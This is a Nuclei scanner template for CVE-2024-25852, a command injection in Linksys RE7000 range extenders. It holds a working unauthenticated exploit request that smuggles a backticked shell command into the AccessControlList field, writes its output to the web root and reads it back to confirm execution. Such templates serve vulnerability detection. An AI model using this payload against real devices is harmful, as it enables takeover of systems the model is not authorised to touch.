id: CVE-2024-25852

info:
  name: Linksys RE7000 - Command Injection
  author: s4e-io
  severity: high
  description: |
    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
  classification:
    epss-score: 0.93046
    epss-percentile: 0.99793
  metadata:
    verified: true
    max-request: 1
    vendor: Linksys
    product: RE7000
  tags: cve,cve2024,unauth,injection,vkev,vuln

variables:
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        PUT /goform/AccessControl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
          - "status_code_1 == 200 && status_code_2 == 200"
        condition: and
# digest: 4b0a00483046022100e5f8c99f069b9861d9006448cbff67539eea4e98b6a70f113effc461acf44fef022100dedd948f15047af1ea93a97054ae0da3ae78809555eef506fd1685984db8c651:922c64590222798bb761d5b6d8e72950